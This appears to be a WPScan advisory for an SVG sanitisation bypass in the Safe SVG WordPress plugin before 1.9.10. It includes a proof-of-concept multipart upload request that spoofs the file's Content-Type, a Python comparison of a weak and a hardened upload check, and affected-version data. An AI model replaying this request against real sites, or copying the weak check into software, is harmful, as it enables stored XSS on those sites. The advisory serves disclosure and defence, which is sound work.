wpvulndb
David Hamann
WPVDB-ID: 4D12533E-BDB7-411F-BCDF-4C5046DB13F3
History: Mar 25, 2022 - 12:00 a.m.

Safe SVG < 1.9.10 - SVG Sanitisation Bypass

2022-03-25 00:00:00
David Hamann
wpscan.com

EPSS: 0.001 (Low)
EPSS percentile: 36.9%

The plugin's sanitisation step can be bypassed by spoofing the Content-Type in the POST request that uploads a file. By exploiting this vulnerability, an attacker can carry out the kinds of attacks the plugin is meant to prevent (mainly XSS, and, depending on how the uploaded SVG files are used later, potentially other XML attacks).

PoC

POST /wp-admin/async-upload.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------27451310545300823063986174174
Content-Length: 947
Connection: close
Cookie: [user with upload capability]

-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="name"

xss.svg
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="action"

upload-attachment
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="_wpnonce"

b281e72731
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="async-upload"; filename="xss.svg"
Content-Type: image/png

-----------------------------27451310545300823063986174174--
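The defensive check this bypass defeats, as an added Python example (not the plugin's own code): a gate that trusts the multipart part's declared Content-Type beside a hardened one that decides from the file extension and the sniffed bytes. The upload record and its SVG body below are constructed sample data; the PoC above omits the file body.

```python
import re

# Constructed sample of the upload described in the advisory: the multipart
# part declares image/png while the bytes are an SVG document.
CONSTRUCTED_UPLOAD = {
    "filename": "xss.svg",
    "declared_type": "image/png",
    "body": b'<?xml version="1.0"?>\n<!-- constructed -->\n'
            b'<svg xmlns="http://www.w3.org/2000/svg"></svg>',
}

SVG_TYPES = {"image/svg+xml", "image/svg"}


def needs_svg_sanitisation_weak(upload: dict) -> bool:
    """Weak gate: trusts the client-supplied Content-Type of the part.
    A forged Content-Type (e.g. image/png) skips sanitisation entirely."""
    return upload["declared_type"].lower() in SVG_TYPES


# Root-element sniff: optional UTF-8 BOM, whitespace, XML declaration,
# comments and DOCTYPE, followed by an <svg> start tag.
_SVG_ROOT = re.compile(
    rb'\A(?:\xef\xbb\xbf)?\s*'
    rb'(?:<\?xml[^>]*\?>\s*|<!--.*?-->\s*|<!DOCTYPE[^>]*>\s*)*'
    rb'<svg\b',
    re.S | re.I,
)


def looks_like_svg(data: bytes) -> bool:
    """Decide from the leading bytes whether the document's root is <svg>."""
    return _SVG_ROOT.match(data[:4096]) is not None


def needs_svg_sanitisation_hardened(upload: dict) -> bool:
    """Hardened gate: sanitise when the extension OR the sniffed content
    says SVG. The declared Content-Type is never the deciding input."""
    ext = upload["filename"].lower().rsplit(".", 1)[-1]
    return ext in ("svg", "svgz") or looks_like_svg(upload["body"])
```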

CPE
Name       Operator   Version
safe-svg   lt         1.9.10
